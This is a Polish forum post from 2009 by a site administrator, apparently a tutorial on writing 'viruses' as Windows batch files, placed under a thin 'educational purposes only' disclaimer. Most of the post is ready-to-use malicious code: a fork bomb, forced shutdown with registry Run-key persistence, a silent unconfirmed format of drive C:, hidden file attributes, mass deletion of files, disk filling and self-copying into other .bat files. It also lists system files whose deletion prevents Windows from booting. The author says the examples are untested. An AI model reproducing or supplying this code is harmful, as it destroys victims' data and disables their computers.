Mikrus
Administrator
Dołączył: 17 Gru 2008
Posty: 83
Przeczytał: 0 tematów
Pomógł: 1 raz
Ostrzeżeń: 0/5
Skąd: mam to wiedzieć!!
|
 Wysłany: Wto 20:54, 10 Lis 2009 Temat postu: Pisanie wirusów!! - .bat |
|
|
WSZYSTKIE ZNAJDUJĄCE SIĘ TU INFORMACJE SĄ PODANE TYLKO I
WYŁĄCZNIE W CELACH EDUKACYJNYCH !!!
NIE ODPOWIADAM ZA SZKODY WYWOŁANE
PRZEZ ZŁE WYKORZYSTANIE ZAWARTEJ TU WIEDZY!!!
A teraz zajmijmy się przyjemnymi rzeczami
Pliki bat są bardzo proste do napisania i mogą wykonywać bardzo ciekawe polecenia
przez wielu nie są uważane za wirusy ale mogą narobić niezłe szkody więc dlatego zamieszczam
ten artykuł w tym dziale.
1. Tworzenie pliku "bat"
Pliki bat tworzymy w notatniku , otwieramy notatnik wpisujemy pewne polecenia ( o nich później)
i zapisujemy z rozszerzeniem bat np. nazwa.bat .
2. Polecenia
-------------------
@ech off
start [link widoczny dla zalogowanych]
------------------
Powyższy programik otwiera nam stronę onet.pl można po start wpisać co chcemy np
start cos.bat otwiera plik cos.bat
start gg.exe otwiera komunikator gg
start [link widoczny dla zalogowanych] otwiera jakąś stronę www
A teraz coś do wkurzenia
----------------
@echo off
:start
start notepad.exe
start.cmd.exe
goto :start
-----------
Ten programik działa podobnie jak powszedni otwiera notatnik i wiersz polecenia
ale najlepsze w nim jest to :
@echo off
:start to jest tak jakby znacznikiem dla programu do których funkcji ma wrócić
start notepad.exe
start.cmd.exe
goto :start goto :start to jest tu najważniejsze gdy program otworzy notatnik i wiersz poleceń wraca to do
:start i znowu otwiera notatnik i wiersz poleceń i tak bez końca w minutę mamy otwartych ponad 600 procesów Smile
----------------------
shutdown.exe -s -t 600
----------------------
ta komenda zamyka nam system Windows po 10 minutach
-s oznacza wyłączenie komputera
-t mówi po jakim czasie ma być zamknięty komputer czas jest podawany w sekundach
zamiast -s możemy dać
-r restartuje komputer
-l wylogowuje użytkownika
teraz dodajmy to do autostartu żeby przy każdym uruchomieniu komp sie wyłączał
---------------
shutdown.exe -s -t 600
@echo off
copy %0 C:\wirus.bat
@echo REGEDIT4 >>a.reg
@echo. >>a.reg
@echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >>a.reg
@echo "win.sys"="C:\\wirus.bat" >>a.reg
@echo. >>a.reg
regedit /s a.reg
dir >nul
del a.reg >nul
i zapisujemy to jako wirus.bat tak jak podaliśmy. Dodany wpis do rejestru będzie uruchamiał
wirusa przy każdym włączeniu kompa
można zamknięcie systemu wyłączyć tą komendom :
---------------------
shutdown.exe -a
--------------------------
-------------------------
@echo off
echo T | format c: /q
cls
-------------------------------
to polecenie formatuje nam dysk C: w trybie szybkim i bez potwierdzenia
T | ( system pyta czy na pewno chcemy sformatować dysk C ten kawałek odpowiada za nas twierdząco
cls czyści ekran żeby użytkownik nie wiedział że coś sie Wogule usuwa
| ten znacznik tworzymy kombinacją klawiszy shift + \
Możemy nadać też naszemu wirusowi atrybuty systemowe
np nie Będzie widoczny nawet gdy mamy załączoną opcje
pokaż pliki ukryte
------------------------------------------
ATTRIB +S +H +R wirus.bat
-------------------------------------------
Atrybuty te możemy nadać każdemu plikowi wystarczy podać jego nazwę tak jak my podaliśmy nazwę naszego wirusa „wirus.bat”. Możemy je również zdjąć zamiast + wpiszmy - i zdejmiemy z określonego pliku atrybuty systemowe
Opóźnienie czasowe
możemy sprawić by jakaś komenda lub program uruchomiła się po konkretnym czasie
@echo off
PING -n 60 127.0.0.1 >nul
start cos.cos
po -n wpisujemy liczbę sekund tu jest np 60
po tym wpisujemy co ma sie uruchomić
tearaz jakiś wirusik
--------------------------------
@echo off
PING -n 2 127.0.0.1 >nul
start cmd.exe
start cmd.exe
PING -n 2 127.0.0.1 >nul
start cmd.exe
start cmd.exe
PING -n 2 127.0.0.1 >nul
start cmd.exe
start cmd.exe
PING -n 2 127.0.0.1 >nul
start cmd.exe
start cmd.exe
shutdown.exe -s -t 15
@echo off
copy %0 C:\wirus.bat
@echo REGEDIT4 >>a.reg
@echo. >>a.reg
@echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >>a.reg
@echo "win.sys"="C:\\wirus.bat" >>a.reg
@echo. >>a.reg
regedit /s a.reg
dir >nul
del a.reg >nul
ATTRIB +S +H +R +A wirus.bat
--------------------------------------
Ten wirus otwiera najpierw co 2 sekundy dwa razy wiersz polecenia
otworzy ich łącznie 8 po tym uruchamia wyłączenie kompa po 15 sekundach
dopisuje się do rejestru i nadaje sobie atrybuty pliku systemowego czyli użytkownik go nie widzi
--------------------
del *exe* /s /q
--------------------
usuwa wszystkie pliki exe w trybie szybkim można zamiast exe postawić kropkę wtedy usunie wszystkie pliki
w folderze w którym sie znajduje lub z dysku albo podać jakąś nazwę pliku np. dokument.txt i usunie tylko ten plik
Pamiętajcie ze del tutaj jest spacja *exe* tutaj jest spacja /s tutaj też jest spacja /q
---------------------------------------------------------------------------------------
@echo off
regedit /e ksyf
:start
cls
type ksyf >> c:windowssystem32syf.dll
goto start
-----------------------------------------------------------------------------------
ten bat zapełnia dysk
Mówią że wirusy bat nie potrafią się rozmnażać w jednym artykule o nich znalazłem coś co powinno was zaciekawić
--------------------------------------------------------------------
@echo off
ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul
--------------------------------------------------------------------
To jest sposób na doklejanie się do innego pliku bat.
----------------------------
type %0 >>inny.bat
----------------------------
Zamazywanie innego pliku bat swoim kodem
Nie wiem czy te przykłady działają nie sprawdzałem ich na swoim komputerze.
Dałem tu listę ważnych plików systemowych po których usunięciu system się nie uruchomi
C:\COMMAND.COM
C:\IO.SYS
C:\MSDOS.SYS
C:\WINDOWS\WIN.COM
C:\WINDOWS\SYSTEM\VMM32\IOS.VXD
C:\WINDOWS\SYSTEM\VMM32.VXD
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\WIN.INI
C:\WINDOWS\SYSTEM.INI
a teraz na dokładkę kilka komend
uruchamiamy je w formacie
@echo off
start i tu komenda
(nie wszystkie działają w Windows XP)
user,exitwindows - zakończenie pracy Windows
user,wnetconnectdialog - okno dialogowe Mapuj Dysk Sieciowy
user,wnetdisconnectdialog - okno dialogowe Odłącz Dysk Sieciowy
user,disableoemlayer - wyłącza grafikę Windows (wygląda jak zawieszenie)
user,enableoemlayer - włącza grafikę Windows
user,repaintscreen - odświeża ekran [F5]
user,setcursorpos - kursor myszki leci w lewy-górny róg
user,tilechildwindows - ustawia okna w rzędzie
user,cascadechildwindows - odwrotność powyższego
user,swapmousebutton - zamienia klawisze myszki
user,setcareblinktime [n] - szybkość migania kursora
user,setdoubleckilcktime [n] - szybkość dwukliku
user.exe,MessageBeep - małe piknięcie
diskcopy,DiskCopyRunDLL - okno dialogowe Kopiuj Dysk
krnl386.exe,ExitKernel - zamknięcie sesji Kernela (bardzo szybkie zamknięcie systemu)
mouse,disable - blokada myszki
keyboard,disable - blokada klawiatury
shell,shellexecute - otwiera okno explorera
shell32,OpenAS_RunDLL - okno dialogowe Otwórz z ...
shell32,SHFormatDrive - okno dialogowe Formatuj
shell32,ShellAboutA - info o pamięci fizycznej i zasobach
shell32,SHexitWindowsEX 0 - wylogowanie z Windowsa (potwierdzenie)
shell32,SHexitWindowsEX 1 - zamyka Windows (potwierdzenie)
shell32,SHexitWindowsEX 2 - restartuje Windows
shell32,SHexitWindowsEX 3 - restartuje powloke Windows
shell32,Control_RunDLL - otwiera Panel Sterowania
shell32,Control_RunDLL desk.cpl - okno właściwości ekranu
shell32,Control_RunDLL main.cpl @0 - okno wlaściwości myszki
shell32,Control_RunDLL main.cpl @1 - okno wlaściwości klawiatury
shell32,Control_RunDLL main.cpl @3 - okno drukarek
shell32,Control_RunDLL powercfg.cpl - właściwości zarządzania energią
shell32,Control_RunDLL sysdm.cpl - okno właściwości systemu
shell32,Control_RunDLL datetime.cpl - okno ustawień daty i czasu
shell32,Control_RunDLL intl.cplv - okno ustawień regionalnych
shell32,Control_RunDLL joy.cpl - okno kontrolerów gry
shell32,Control_RunDLL sticpl.cpl - wlaściwości skanerów
shell32,Control_RunDLL findfast.cpl - okno Find Fastu
Wszystkie informacje które są zawarte w tym artykule były ściągnięte z Internetu.
Post został pochwalony 1 raz |
|
|
FAQ
Szukaj
Użytkownicy
Grupy
Galerie
Rejestracja
Zaloguj się, by sprawdzić wiadomości
Zaloguj
